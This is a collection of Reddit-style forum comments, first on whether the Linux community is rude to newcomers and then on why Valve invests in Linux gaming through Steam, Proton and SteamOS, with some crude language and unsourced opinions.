This isn't to say there aren't plenty of very nice people at all, it's just kind of interesting.
Which recent thread are you dissatisfied with exactly?
[deleted]
The other thing with linus rants is that they aren't an every day occurence.  It's like once every couple years that he really tears into somebody.

if you're an asshole every day, it just loses all impact.
I've been using Linux since 1993. Unix variants since the early 1980s. And Linux - and UNIX in general - have always had a terrible reputation of attracting rude and elitist computer snobs. And this hurt Linux in the 1990s and early 2000s during the first Redhat and Caldera push to get Linux accepted on the desktop. (Remember Caldera Network Desktop?) 

The UNIX desktop might have been successful if not for the idiocy of users and most especially The Open Group. 

Linux nerds should learn to be nice to prospective users. 
Linus isn't rude, he's Finnish.
Fuck you.
Showerthoughts: Can you even produce one example of someone that pisses off newbies here?
I agree with you 100% but sadly this is the nature of the Linux community. 

You see it spilling over into other areas as well. Check the cesspool that is XDA forums.

It's just background noise, like trolls on Twitter, that you have to learn to ignore. You'll find plenty of decent helpful Linux users out there. Only they are less vocal.
Thank you!

Hopefully someone will get your point.  But people are people, and some people just want to be angry.  I once explained the distributive property in Algebra by likening it to buying 5 packages with 10 pencils and 3 erasers in each package.   The guy got it immediately  though he'd struggled with it in the past.  He basically yelled at me "Why the fuck didn't they say that to me before!"  I mean, the irony of getting angry because you easily understood the answer.

So people are going to be shits one way or the other.

Please don't yell at me for saying this.
[deleted]
Linux is superior.  OK I want to learn it.  No way you are too stupid.
As a noob I appreciate this. Iam in way over my head, my first Linux install ever is arch with i3wm right now, so naturally a lot of "stupid" questions arise. Spread Linux and the open source idea, don't yell at people.
You have some boring showerthoughts, friend. 
yes but i am spartacus
Unless newbies annoy us with "just google it" issues!
What is the point of this post? Did somebody criticize you and now you're angry?
Is Linux ever rude to someone who's not deserving it very much for trying to bamboozle him?
Don't ask stupid questions.

There is /r/linuxquestions and /r/linux4noobs
[deleted]
But it happens here! 
And somewhere he acknowledged that he doesn't have to be like that, but that his style was to be frank and work with people who could stand the heat. There are people who prefer a more polite environment and it is fine. As long as they deliver.
Could you provide a link to mentioned regression debate? Thanks.
It's something I noticed with internet "autism", if you will. There's a certain personality type that gravitates to certain spaces online and just loves bullying and belittling others, thinking they're so smugly superior when quite obviously they suffer from some form of Dunning-Krueger's. 
I remember when I first started using Linux a couple of years ago, oddly enough, my first OS was called PCLinuxOS, not Ubuntu like most people. I had no idea what I was doing, things were constantly breaking and I was constantly confused. But I gotta say one of the best things about Linux is the community, to this day, every problem I've ever had was solved online by the community. In my opinion, everyone is super nice. I think your idea of people being mean originates from reddit, rather than the entire community. Nowadays I'm running a custom Arch Kernl with a super tweaked i3 for my wm, and I'm in a great state. Yet I'm always experimenting and learnning something new everyday, even after years of experiance. And yet again, the community is there to help. 
To be clear, there was a post about this the other day but that post was like six years old and the reply came five months late.  I'm not sure that this is quite the epidemic you imply. 
The elitism in the linux community is one of the reasons why it is so small. A lot of ppl are worse than the mac zombies.
Agreed ... if we want this platform to grow, then we need to all help each other and the newbies.
To be honest. Its something that software dev teams need more of. Some of the really really stupid shit I have seen done over the years.. Some people really really do deserve it.

Most people when totally ripped a new one typically react one of two ways. They run and hide and huff leave their job etc..... Or they realise that they were in fact being stupid and learn from it. But if you do go off on somebody you do't make it personal about them. Just keep it on point what is wrong with the code.

There are rude people, there are "not rude" people, there are angry people, there are kind people, there are different people everywhere.  
If 

>r/linux yells at newbies with no reason.

then it is not usual here.

"Please stop" bashing "linux" crowd about being rude when there are only few rude one there & start bashing rude ones. This way it may make linux crowd less rude (while I don't see it much rude at all).

Bashing linux crowd at whole became a trend that adds to sinister perception that "linux community" is rude and that's not true at all.

PS. 

I sometimes really want to be rude to newbie linux user that starts his journey with crying that linux community rude & sucks all over, because most likely he was one that was rude. It's not about communication in "linux community" - it is about communication in general. If you be rude , you'll get it back. Ofc. some people won't notice that they were rude, but will cry when get some not nice glances back. 
Dude, Torvalds is a little kinderghartner compared to the middle school Ubuntu Canonical cult on this sub. Anyone who doesn't worship Shuttlecock's worth will be demonized, hounded, trolled and banned into obscurity by teenagers insisting at the point of a gun that Kali Tools is the same exact thing as Kali OS and running as root will threaten to tear the fabric of the universe open. A more snivelling lot of self important junior management level caucazoid board warrariors to be found nowhere else outside racist masterrace BS. 
Meh, I think the West is experiencing a huge shift towards becoming even bigger pussies than they are already because of the entire 3rd wave feminism cancer and if a newb can't handle someone telling them to RTFM or ::gasp:: reading an opinion of a stranger on the internet that they don't like I consider their tears to be a contribution to the human race.
Another showerthought: You shouldn't play the role of moral thought police.  Because you're not my mother.
How can one piss off newbies if one leaves them to their own devices?
What's the history here? Pretty much the only distinguishable thing keeping people from adopting Linux is any amount of hassle dealing with non-native games. Steam eliminated a ***massive*** chunk of that. And if [Battle.net](https://Battle.net) and Epic Games followed suit, I honestly can't even fathom why I would boot up Windows.

But the others don't seem to be interested at all. 

What makes Valve the Linux company?
Years ago, Gabe Newell was very vocal about the impact the Microsoft Store in Windows in being anti-competitive, with which they launched their investments and development into Linux including steamos.

At the time windows 8 was starting to look like a closed, tablet-esque experience.

Now we have far too many desktop launchers and stores.
1. Valve gives a lot of freedom to their developers to choose what they work on, rather than a public company which needs to demonstrate an ROI on _every_ project (though from internal rumours a couple of years ago, you have to have at least some profitable projects or you'll get pushed out).
2. You need to look at when Valve started their Linux push. Microsoft had just launched the Windows Store. Apple were tightening gatekeeper to scare normal users away from installing non-app store apps on Macs. Alarm bells must have been going off in Valve's heads as they foresaw similar changes from Microsoft (which have happened, though much more slowly than people thought back then - Windows 10 S devices can only install app store apps without going through a process akin to sideloading on android). 

  This was an existential threat to Valve, if they lose their 30% of everyone else's PC revenue because it's so much harder to buy outside the Windows store. So Linux is their plan B for an eventual Microsoft Windows store lockdown. This is also why their outward pushes to get gamers onto Linux has slowed as they became less worried about Microsoft and Epic became the biggest threat, though thankfully their technical contributions are still ongoing.

Other companies are more satisfied to get their 70%, and while Blizzard and EA and the like have their own stores, and obviously prefer you buy there, if Origin or Battle.net went away and they had to sell on the Microsoft store, they'd survive. Only Valve is as exposed here. Epic would like to get the kind of market share where they would be similarly exposed, but their tactic is to pick fights with Google/Apple, and I'm sure Microsoft/Sony are next on consoles, so if Microsoft tried the same on Windows I'd expect another public brawl.
In addition to previous responses: if Valve successfully makes Linux into a viable choice for gaming, then they can resurrect Steam Machines, which means that console gamers will have a third system to choose from, that will have PC exclusive games.
Microsoft is a principal rival for Valve.  Microsoft owns their own game publishing company, provides the most popular OS used for gaming, and sells one of the most popular gaming television consoles. 

This means that Valve has to compete with Microsoft directly on a platform that Microsoft owns.  This puts Valve in a undesirable position. Microsoft's primary concern when developing the platform that Valve depends on isn't going to be Valve and Steam.  It's going to be their own gaming infrastructure. 

It is common for companies turn to Linux to provide breathing room and help keep Microsoft more honest through competition.  Novell did this with the movement to their Linux desktop and server offerings (which ultimately failed).  IBM does this.  Oracle does this.  Even if they make more money from Windows sales then Linux, Linux is still going to be part of their corporate strategy. 

In addition to this Valve had ambitions to break into the gaming television console market.  Linux does well in console situations and promised to provide a common platform for PC and console. 

Other 'gaming companies' are more just publishers or game developers that don't have the same development resources or ambitions that Valve has.
It's a strategic long-term investment from Valve's perspective as they considered the Windows Store their biggest threat, what with Google & Apple successfully running closed garden with their lately challenged "30% tax on all forms of payments, upfront or in-app". MS saw the market shift and they want in.

The problem is contrary to Google's Android & Apple IOS that were *born* as closed ecosystems, Windows has long been an "open" platform (yes, I realize that seems counter-intuitive, but now that we have GooglePlay & Apple Store to look at, we KNOW it could have very well been otherwise) where users are essentially free to run wtv *.exe/*.msi they want and there's essentially little to no restrictions to the distribution channels of those.

Changing that to closed ecosystem overnight would be suicide (though marketshare-wise, it'll just boost the sales of bootleg enterprises - and malware - rather than the big migration this sub sometimes fantasizes about), and a nightmare from nearly all front. 

So Valve understands this is a long term strategy from Microsoft, and they've established theirs as boosting a platform that has reasonably strong foundations to build upon a decent gaming environment, taking into account that s.o. has to take the fall for cross-platform compatibility phase, in order to be able to switchover as quickly as possible should MS ever leverage their market dominance and platform control to cement Windows Store as the sole channel for software (of course they'll be "other ways" but it's irrelevant to 90%+ of the computer population that'll just do wtv MS says to do).
" What makes Valve the Linux company? "

SteamOS and Steam Machine. They would very much like to have their own gaming platform.
Valve considers a near-complete dependance on Windows and Microsoft's future whims a threat to their sustainability. They want to eventually enable linux systems to become viable because lack of games is the biggest reason keeping people on windows (its no longer Office, and many formaerly windows exclusive apps transitioned into web services that no longer run only on windows).

Maintaining a plan B they could switch to anytime allows Valve to strengthen their negotiation position with Microsoft. Imagine SteamOS/Steam for linux running more windows games better than regular windows 10x and later - the importance of preserving backwards compatibility forward through containers and proton while also cutting windows from the equation is massively underestimated.
What makes it even more baffling is that Proton is open-source, and is derived from open-source components.  Valve has already *done* the work of integrating WINE and DXVK (not to mention all the contributions upstreamed to WINE) into a form easily usable to integrate into a launcher

And it's not just Valve/Proton - there's the Lutris project also

Another game publishing company, say one which "valued open platforms", could add the same functionality with minimal effort, with no licensing encumberances other than the GPL.  Which need not affect anything else in their launcher if it was distributed as an optional module.

Granted, at that low level of commitment, they'd not really be offering anything that Valve didn't, but they'd no longer be in a situation where Valve had a unique selling point.  And they'd gain the "insurance" against Microsoft pulling an Apple that motivated Valve in the first place - in fact the more publishers that do this, the greater the insurance effect: knowing that they'd drive Steam fully onto Linux might make Microsoft think twice about going walled-garden app store.  Knowing that they'd also push Epic or Ubisoft or EA would stop them dead in their tracks.

At this point I think we might guess one of two things: either there is some ideological opposition to open-source/Linux at a high level in these publishers, or else they're already working on it in private.
The only *consumer* company to take Linux gaming seriously - I work in the largest family entertainment center (“arcade”) in the Southern Hemisphere and 25-50% of our machines run a Linux-based operating system (usually Ubuntu, but sometimes Red Hat or Debian, less frequently others)... The rest run a Microsoft Windows-based operating system (usually Windows XP or Windows 7, occasionally others).

Rather ironically, we even have “Microsoft” and “Nintendo” machines that run Linux-based operating systems!

So yeah, in the *commercial* gaming market, Linux-based operating systems are B-I-G!
I don't think Valve the gaming company really cares all that much, but Valve the distribution platform company cares very much that they don't get killed by the Microsoft Store walling in a garden.

But also, Croteam is very Linux friendly, as is Paradox Games,
I wouldn't say they're the only gaming company who takes Linux seriously, others do, it's just they don't have a store front like Valve
Valve isn't the first. For those of us who have been around awhile, we remember Loki. Back in the bad old days, there was evidence that Microsoft was paying game companies to **not** port to Linux, and this effectively killed companies like Loki. I wouldn't be surprised if it's still happening.

This is before we even get to things like DirectX, which like case of [C# and Java](http://www.paulgraham.com/fix.html), was only created because Microsoft didn't have control over OpenGL and you weren't locked to one platform with OpenGL.

Also, unlike the virus myth, there's just not as big a market for AAA gaming on Linux. So you'll often see indie games ported to Linux, but not big games which might also not be developed under the most stringent of coding standards (aka, plenty of sloppy platform specific code).
Valve believes more in the cutting edge and giving their devs more freedom.  
Also Valve is more consumer friendly, while the other companies focus on money.
I believe Gabe Newel addressed that steam was fully dependent on windows prior to their mac/linux launch. In terms of business, it makes your product stronger if you don't have that dependence on a large company like that. He talked about how Microsoft could just stiff-arm steam and say their software doesn't work on windows anymore unless they pay Microsoft for all the business they do on their platform. 

**If you have Linux to fall back on in any case, this weakens Microsofts control over the steam store.**

It also opens steam up as the primary store for linux-based game developers (regardless of how many people are in that group). 

They talk about the development of Half-Life 2 was mostly the development of the Source Engine, and once you had that engine you could build different games off of it. Now they expanded that to cross-platform, and ported their games to give full support for Windows/Mac/Linux.

Battle.net and Epic games don't have to open their stores up to linux support. Battle.net does have some Mac support I believe (haven't checked but I'm pretty sure at least wow runs on mac). Battle.net can get more new customers by expanding their business in China instead of developing linux support for their games. 

I think the companies like Epic and Battle.net are intimidated by linux, because they likely have Microsoft software for all of their business needs (maybe some developers use it or are familiar with it). They don't want to invest in the cross-platform because they don't expect to get a return out of it. 

The benefit Valve gets from linux support is that if Microsoft booted them off windows entirely, they can continue with their business on free open-source software.
Valve's serious embrace of Linux was borne out of a mixture of both fear on Valve's end of the long-term potential for a total lock-in on Microsoft and Apple platforms and desire for a monopoly on a niche but still nontrivial platform. They got their wish on the latter point-- the market basically belongs to them now.

There are essentially two groups that aren't trying to win in the Linux space-- the "don't have tos" and the "don't want tos". The poster child for the former is probably Blizzard. While they don't support Linux for support cost reasons, their games generally run well enough in Wine that they don't see a need to specifically target the platform. It's been long-rumored that they do some Linux testing internally to ensure new patches of their games don't *break* the games on Linux despite refusal to support the platform publicly. They also make no specific effort to antagonize Linux users--we don't get banned for it and it's pretty evident from the way their games' anti-cheating mechanisms work that they have written the software to detect and tolerate running the games on an "unauthorized" platform.

Then there are companies like EA that seem to believe Valve is too entrenched and therefore entering the Linux market is a hopeless venture. Their strategy seems to be to try to fight Valve's Linux market share by trying to destroy the Linux market itself-- Make life so miserable for Linux users that they ultimately migrate to Windows (and thus enter a space where EA can fight for attention.)
Wait, what about FeralGames? :o
Valve is the only company that stands to gain massively. They are a distribution network that take significant cuts of sales--the more games sold overall, the more cuts they get.

Individual large game publishers won't expect large enough sales on Linux to be worth the resources spent in porting and supporting it. But because Valve gets slices of _all_ sales (including all the low-effort Unity engine garbage that makes up 99% of the Steam store that CAN be ported to Linux in a couple afternoons), the money is there for them.
A lot of indie games and a few of the A or AA publishers like Paradox cover Linux too; it seems like it's paradoxically the blockbuster AAA releases with the biggest budgets that tend to be Windows-exclusive. Perhaps it's because they're so big they don't even need our business. Maybe it's because (in some cases) they develop "multiplatform" games mainly with consoles in mind and porting to PCs is so much additional trouble that they just barely crawl over the Windows finish line and call it a day.
Companies never take Linux seriously because there isn't enough of a playerbase. But there isn't enough of a playerbase because companies never take linux seriously. 

It's a vicious cycle
Because Gabe don't like Windows 8.
Because they are, or at least were, deathly afraid of Microsoft and the Windows Store. Especially when Windows 8 came out. But the Windows Store completely bombed in the market(went absolutely nowhere and was a complete wasteland) for almost a decade!

 Every other game developer mostly transitioned to consoles, so it's not as much of a concern for them.
I'm not a business major or anything, but I'm skeptical about this narrative that they want to be some hero fighting against Microsoft.

Even if the idea was in their mind, I don't think they would have come this far if they didn't think sporting Linux was a sound business decision.

The difference between valve and your typical video game company, is that their primary product is a marketplace. 

Every Linux sale on steam is money in valve's pocket. In the early days, valve pushed a lot of indie companies to have native Linux versions of their games, but I think this was a mistake. I've heard a lot of dissatisfaction from game developers regarding Linux, and I think this hurt their developer relations more than it helped.

Game development is risky and expensive in the best circumstances. One game is only ever going to reach a small portion of the total market. Putting a lot of QA resources into a port to reach a fraction of 1% of the market doesn't seem like such a good business decision to me.

But for valve, they reach the whole market all the time. 1% of users is not insignificant given the total size of the market, which is massive. They can afford to put a few developers on proton or on video drivers and still make a tidy profit, all while slowly growing the market and fostering good will.

This is why I think valve's Linux support overall has been fairly successful, even if they haven't been all that successful in convincing studios to support it.
This is a post much better suited for r/linux_gaming, but...

For one thing, Linux is 1% of the gaming market. Ubisoft, EA, Activision/Blizzard, and Epic Games would all with 100% certainty lose money by supporting Linux. And a LOT of it. 

Do you know how much money it costs to support Windows for AAA developers that actually produce/develop games (unlike Valve*)? Billions of dollars per year, between them. This isn't even counting support, because obviously it would cost more to Windows than Linux, but we don't even have to take that into account. 

Yes, sure, also developing for Linux wouldn't cost the same as developing for Windows, because of course a lot of the same assets could be used and a lot of work wouldn't have to be duplicated, but a lot of it ABSOLUTELY would be. Valve probably has no more than 20 people combined working on Linux support. If that. And that includes contracted people like Philip, Josh, etc. 

Given that Valve doesn't spend any actual money on Linux outside those 20-30 (at the most) peoples' salaries, those costs aren't that high. Valve doesn't make games anymore. No, one game every 10 years doesn't count. 

Add to that, the fact that Valve has no shareholders. Meanwhile Activision/Blizzard, EA, etc. absolutely do. Some of them are public, some of them are private equity (like Epic with Tencent and all that), but bottom line, Valve is a tiny-ass company that happens to be the most profitable company in the world relative to employee size, and can honestly do whatever the fuck they want, and never have to worry one single bit about quarterly earnings. None of the companies you mention, or any companies like them, have that luxury. 

They would all lose SO much money by developing for and supporting Linux, I have no idea why on earth you would even be asking this question. Honestly. It sucks, but we're not getting jack shit from anyone except Valve and indie devs (and the odd random AAA game from Feral or Deep Silver) until we grow in market share by a considerable amount, or Capitalism collapses and stops being a factor, whichever comes first.
> What's the history here? 

Part of the history is probably that Half-Life uses the Quake engine licensed from ID Software, Quake was ported to Linux in 1996 (HL came out in 1999) and a lot of the ID Software software had Linux ports, so they, their tooling, and their engine is probably one of the reasons why Valve headed in that direction from day one. The recommended way of setting up a Half-Life (and CS/TFC and all the other mods) server was to run the Half-Life dedicated server under Linux, and the game itself ran great under Wine if you had a Matrox G400 or something like that.

So Valve might be the current torch bearer, but ID should get some cred for doing a lot during the '90s.
I think lack of talent in AAA companies + management that leads the production cycle is the main culprit. There's also that self-perpetuating myth that Windows is de facto platform for gaming - despite metrics that show that even software running through wine sometimes ends up having bigger and more stable FPS, not to even mention that for most of games I run, I've never had them crashing on me or whatever, while I read a LOT of complaints about crashes from windows users.

Go figure. Anyway.

I remember reading that ID Software had few Linux users; in a company of about 70 people, I interpreted "few" as "about 3-4 devs". Those people would have freedom to spend time to release portable executable. In a company like Bethesda, that is not going to happen because their time will be accounted for in a more efficient way.

The additional problem is support. A company without talent, or a company with a need to protect their reputation, simply cannot put themselves into a position where their product doesn't work on some platform, unless they can prove its not their problem.
It is somewhat acceptable that when stuff on windows crashes, well, its just bugs, right?
When stuff doesn't work on Linux, pro users will go and try to fix it themselves (I'd often try to collaborate with steam devs to help them bugfix, gather opengl call traces, etc), but there'll be a large group of wannabes who will just pester devs on forums with "MY GAME DOESN'T WORK AND I PAID FOR IT!!!", then write bad reviews, etc...

When your rep is your living, you just can't afford that.

I think Valve has the talent AND the rep to be able to experiment with Linux and launch successful cross-platform software.

P.S. I have +20y of dev experience, I have built 3D engines from scratch for fun, I have worked in AAA game companies and successfully deployed at least one world famous title. All software I write is portable, independent of language I use (I oscillate a lot between C++ and Haskell).
Gaming is not the reason people are not adopting Linux. The fact is, the majority of people do not know how to install a new operating system, nor do they care to. The fact is, people will use whatever comes on the machine they bought, and that is, with the exception of Chrome books, and Apple products, almost always Windows.

This leads to Linux having an incredibly low market share, which means that porting your game to Linux is often a good bit of work for little profit. Not to mention, due to the large variety of Linux operating systems, and many bits of hardware having their drivers be community supported instead of by the OEM, games will often get weird bugs. This means that porting your game to Linux leads to a large increase in bug reports filed.

Due to these reasons, it makes little sense to port games to Linux. The only reason Valve started to was because Microsoft built a competing game store into Windows 10, and Valve saw this as a threat to their Steam store for precisely the same reason why Linux doesn't gain marketshare. If a good game store is built into the operating system, many casual consumers may never download Steam because they can get all their games through the game store built into the operating system. This of course doesn't effect Valve nearly as much, because they are already well established with their consumer base, and their consumer base is a large collection of mostly enthusiasts.  However, it's a threat to their stream of new consumers who may not already be established on the steam ecosystem.
Gabe Newell used to work for microsoft. They also have their own linux based gaming machines.

That being said, after Microsoft stated it planned on forcing all software through the app store, Valve saw the writing on the wall. As when microsoft makes a proclamation, it's not if but when it happens. (The current cloud tied stuff they are doing and want to eventually make all storage for windows home and pro cloud only and lock your install to the cloud traces back to their palladium platform they wanted to implement in the early 2000s)

Newell knowing his former employer well acted to start supporting linux immediately.


It's hilarious Epic is so anti-linux when Apple is doing them dirty right now, and microsoft has made it known they will eventually being mandating the same things as apple.

Valve is looking over the Horizon and seeing a shitshow where everyone else is operating based on what is happening now.
because of money
Because maybe in a few years you will only stream your game to your end-user device and not install it anymore. If computing power is only provided by the cloud, then Linux will definitely play a bigger role.
I think part of it could be Steam Machines and the whole SteamOS thing. The whole thing is basically just debian linux with Steam preinstalled. And other companies probably don't take it seriously because of the cycle of companies seeing the low marketshare and deciding it's not worth it, and the users seeing the software they want to use not available on linux so they don't use linux and stick to windows. I guess technically you could count google as a gaming company with Stadia but all the games on there don't have official linux releases available, even though Stadia is basically just a really big linux server.

There is also Atari, which has their own gaming console coming soon and it's basically just steam machines but again. It runs a linux os called Atari World, but you can also install any OS on it, so you could put SteamOS on it. I doubt much will really come from that but it could be pretty big, since Atari was a big name back then and it'd be crazy to see them release an official, brand new console
I think there's more to it than the relative developer freedom and scare from the Windows Store, although those are absolutely involved.

I think it's also because Valve is one of the only gaming companies to mainly plan around the long term especially when it involves setting up what is essentially a new market for them, as shown by Steam itself: It took off because it was a direct solvent to a lot of the bigger issues that were crippling PC gaming back in 2006-2010 or so from both a developer/publisher *and* consumer perspective. I get the feeling that they're trying to do a similar thing with Linux as a whole in the wake of Microsoft trying to turn Windows into their own version of OS X which at least arguably was hurting desktop PCs, basically they'd invest in it, work on it and help it expand in areas it's struggled in which, if it pays off, would result in them being lifted up alongside it as a direct result. Think about the overall strategy they're applying and the news we hear: They're making Linux not only more gaming capable but more *desktop* capable (A lot of work is going towards graphics drivers, a common painful area for Linux users even outside of gaming and *especially* before Valve got involved) and making Source 2 more friendly both for modders and other developers to use, all while basically being the *only* player in the market for Linux users. I could even see them trying the Steam Machine console style thing once everything's more polished again, too.

If they pull it off and make Linux a serious competitor (I'm not even meaning beating Windows in marketshare, I'm meaning reaching even around a mere 10% of the market) then they've basically at the worst case got a significant head start over the other big players in a reasonably sized market not only in the actual consumer-facing marketplace, but the fully cross-platform backend tools that devs will use to make their games...I mean, Source's Linux optimisation is the best out there already, even the og Source engine is often faster on Linux than Windows these days without sacrificing graphical effects as far as I know. On top of that, the Linux market they have is known for being loyal when treated well and just look at how loyal Linux gamers tend to be towards Valve already, even people who won't run it themselves and dislike DRM in general tend to admit their overall effect on Linux/OSS as a whole has been positive.
Keep in mind that Epic is actively trying to dethrone Steam. The recent Game Theory YouTube video really illuminates the long-game of Epic’s motives with the recent iOS/Android drama, and how they’re setting up the chess board to checkmate Steam with their own store platform. 

If you value Linux as a gaming platform this is terrible news, as Epic shows zero interest in Linux! Steam isn’t perfect, and doesn’t promote open source much at all, but their contribution to Linux, just in drumming up gaming support, is massive!
I'd say ArenaNet who develops the GuildWars games actively acknowledge Linux as a gaming platform. They're the only mainstream MMO that I know of that went and gave the go ahead for players to use Linux. They haven't created a Linux native version of the game yet, but they support players who use wine (Support as in don't actively try to ban them)
You mean for games... otherwise, one of the biggest world companies uses Linux for many internal systems, for design and other tasks. Linux is everywhere.
From the gaming company point of view, last year, one of the Planetary Annihilation devs [posted](https://twitter.com/bgolus/status/1080213166116597760) that Linux was 0.5% of sales, and 20% of crashes - with a large chunk of the blame being fragmentation. 

I've done little bits of my game dev and other software engineering bits with Linux, but it can be tougher to support, and not ever studio can handle that.
Because Valve is the only serious gaming company.
Because Valve wants to include Linux in their portfolio of platform features. Origin, Epic Games, uPlay, BattleNet and others don't support it so Steam wants to be the ultimate platform.
Square Enix also released many of their games, such as Shadow of the Tomb Raider and Deus Ex: Mankind Divided for Linux. Many big releases have a native Linux version. While Valve does most of the heavy lifting, they're not the only ones.

Some companies have decided to drop Linux support for various reasons. For example, when CDPR released the Linux port of The Witcher 2, they received death threats because of the issues that the port had, and since then they have ceased all Linux related activity, which is Why Witcher 3, Cyberpunk 2077 and GOG Galaxy won't have a Linux version.

Linux is getting more and more popular, but it will take several more years for it to become popular enough for most developers to care.
Let's not forget GoG, Lutris, and Humble Bundle.

I got most of my early commercial Linux games from Humble Bundle. This was long before Steam was available as a game source on Linux. I think the success of the Humble Bundle may have helped influence Valve in setting up the Steam storefront.

GoG may or may have contributed to WINE (I haven't looked at PR history) but they have definitely made contributions to other emulators and libraries, which definitely helps in gaming adoption on Linux.

Lutris may or or may not have contributed to any FLOSS projects, but they definitely ease the install and integration of an assortment of emulators and other libraries, again easing adoption of gaming on Linux.
There are several things wrong with the OP's argument. First, the big thing holding back people from moving to Linux isn't a lack of native games. There are lots of reasons, but that's not even in the top five.

Second, Valve is far from the only Linux-friendly gaming company. They aren't the first, largest, or most active even. This feels more like an ad for Valve than a serious discussion.
Because valve always thought about the REAL future for gaming and innovating, they are the ones to introduce for fps (half-life), story and physics driven gameplay(half-life 2), digital gaming store(steam), VR (half-life alyx), community content (steam), moba(dota), class based player(team fortress) and portal with the puzzles, not saying they are the first but the ones to give an impact and call of attention or one of the biggest players, they see linux as a new way to distribute games, a free way where there are no restrictions, and use the hardware you want, pretty sure that they are investing in linux gaming for cloud gaming and trying the steam machines again
From a corporate perspective, it seems they view Linux users as simply "people who don't like paying for things" and calculate the potential ROI accordingly.
Well, there is also Unity.

It makes game porting to linux easy. In my opinion it has huge impact too.
I believe Valve is smart enough to know:

- That gaming (for better or worse) is going to the cloud, and running a cloud service on Windows Server is moronic. 

- That it is possible for you to do whatever you want with it without taking anyone's bs (EA doesn't know this and is now crying for Apple to be fair, even though Apple are in their full right to be total douches if they want to because that is the nature of proprietary software...just wait until Microsoft do a dumb thing that undermines gaming like going full ARM or store-only).
Linux is free and cost effective at the third world countries.
All about options. No one trusts Microsoft long term to be an open platform
If Sony started porting their games to Linux instead of Windows, I think Microsoft's dominance in PC gaming would be affected. Gamers have no reason to use Linux, but I think they may try it out if Linux had some exclusive titles.
Google Stadia uses Linux and Vulkan in the cloud, so any game running on it has a version that runs on Linux. So while that version may or may not be directly accessible to you as a consumer, it does mean that all Stadia games have a potential Linux port.
Valve provides Proton if you play games through Steam.  

You can play any game you own, in any format, through Steam using Proton.  And almost anything else that Proton doesn't take care of can played through Lutris, or through GFN running through Lutris.  Companies don't really have to focus as much on Linux compatibility tools because it's pretty much covered.
Valve gets free money from selling games on steam due to their store monopoly

Other companies will weigh the effort of porting to Linux against the potential income from Linux players.
Didn't valves steam console thing run on Linux?
I am on Linux and greatly enjoy using Steam with the built in Proton compatibility layer.

I spend real money in their store too.
SteamOS I would say, and the steam machine
they don't

one way they could have helped a little bit for the developpers to choose to target linux, is for example to drop the 30% tax down to 15%

that way i'm pretty sure companies would be more supportive of the idea to target a new platform

this + a set of tools + environment to develop on linux with ease

but nope, they love linux so much that they prefer to go with the emulation route, with all its issues
I like GoG so much. Shame they don't seem to give a shot about Linux.
honestly, I think this will all soon be moot, as Gaming As A Service subscriptions such as GeForce Now and Google Stadia gain traction

the former [already works in your web browser](https://www.gamespot.com/articles/geforce-now-works-through-web-browsers-now-but-onl/1100-6481077) on the linux-based Chromebook platform - and they clearly have plans to expand this to other operating systems, in future

...at which point, what will it matter what OS your local machine is running?
It is because you aren't paying attention. There are many games that come out on Linux, but aren't from Valve. I don't buy any games from Valve.
You guys are forgetting that Microsoft tried to make the Microsoft store the only way to get software for Windows, it didn't go so well for them but that was the event that triggered Valve's investment in Linux
Valve's interest is more selfish, they were clearly concerned about Windows and Mac OS becoming walled gardens.

They thus decided to create Steam consoles - as proof, remember Steam controller, Big Picture Mode, SteamOS, Steam boxes etc. 

They then realised that there were multiple problems - game devs doing bad jobs of porting things to Linux, not keeping it up to date (e.g Borderlands, Warhammer, Saints Row etc.), very few AAA games compared to Linux, game devs finding it tough to port games over and being too attached to DirectX, AMD GPU driver problems etc.

So they stopped some of those other projects and focused on fixing fundamental Linux problems such as the AMD GPU drivers, Wine, contributed to DXVK and focused on getting Windows game binaries working on Linux with Proton.

Their goal still seemed to be a Steam console. But then the game streaming wave started - Stadia, GeForce Now, Xbox game streaming etc. Given how Stadia uses Linux servers with Vulkan, and game devs were OK with porting games to it, Valve has now pivoted over to game streaming.
>What makes Valve the Linux company?

Leverage against Microsoft, and nothing else.

Same reason why a lot of OEMs suddenly decide to ship low priced laptops with Linux: it's a tactic to get Microsoft to give them a discount on the license fee of Windows.
Microsoft signed exclusive deals with companies such as EA Games, for example, to only support games on their OS.  In turn, Microsoft would further customize their OS to support their games.  Since Microsoft also had ownership in Apple at the time, they too were included.

Linux was excluded from such business deals since Microsoft has no ownership and because no one group owns or controls the whole of Linux, to be able to make a guaranteed similar deal.

As a result, you have **both** the game developers and the OS development working together to optimize game use.
Google is also serious about Linux, Stadia is based on Linux
They are private company.
U
Sadly even valve is not that serious about it. CS:GO(native) has been unplayable for months has the sound cache file deletes itself when loading the map. I reported the issue to valve on github and contacted them. Yet this still has not been fixed.
The simple response is money.

A game team spoke up about why they were dropping support for Linux, it came down to the fact that 80% of support tickets were Linux while 1% or less of sales were Linux. 

I’m not saying it’s right or wrong, just the truth.
Coz it makes (and could make) 'em $$
There are good answers here about why Valve specifically is interested in Linux. But you also have to look on the other side: why other companies not interested? Probably because Linux market share is traditionally pretty tiny, and most of them are willing to dual boot or whatever they need to play games anyways, so it's just not worth the effort.
Everyone is making Valve sound very progressive (because that's our community), but the core strategy is very conservative. 

The steam store is a rent-seeking money printer, and investment in Linux ensures the money printer keeps going bbbbrrrrrrtttttttt. That's it.

And in theory, Valve doesn't really ever care if Linux gaming takes off, they only have to invest enough resources to make it look like it could. Microsoft is an aggressive, but predictable business partner. This strategy controls them. 

This could be interpreted as entitled sounding, but I mean what the hell are they doing with all their money, anyways? They're private so we can't  know. But if they had any *active* plans for Linux gaming, you can't help but think they could be doing much, much more.
There are a lot of good answers, but it all came to be, if I remember correnctly, around Windows8 where Microsoft had some sort of playstore implementation which did _not_ work for Valve. Notch, the maker of Minecraft, was also pretty pissed about and Valve started their Linux-stuff so they had something to fall back on if Microsoft didn't play ball. Again, iirc, Microsft did play ball and Steam is still on Windows, but it seems like Gabe Newell has taken a liking to Linux and they are _really_ pushing gaming on Linux.

Note that Gabe also worked on the first three releases on Windows and later said: "Newell has also criticized the Xbox Live service, referring to it as "a train wreck". He was also critical of Microsoft's Windows 8 operating system, calling it a "catastrophe" and "a threat" to the open nature of PC gaming." <- Wikipedia.
I am not sure if this has been posted here or not, but steam didn’t support Linux because of a love of Linux. When Microsoft released windows 8 and windows phone they created their own App Store and steam saw this as a potential threat to their game store. Linux was a way to apply pressure because if they could get enough game support and gamers to jump ship to Linux, then they wouldn’t have to work about Microsoft clamping down on their store and charging for their game sales.
Valve bet pretty hard on the "steam console" being a hit. By using linux they didn't need microsoft who they were competing with.

That's the only reason. They didn't give a shit about linux before that.
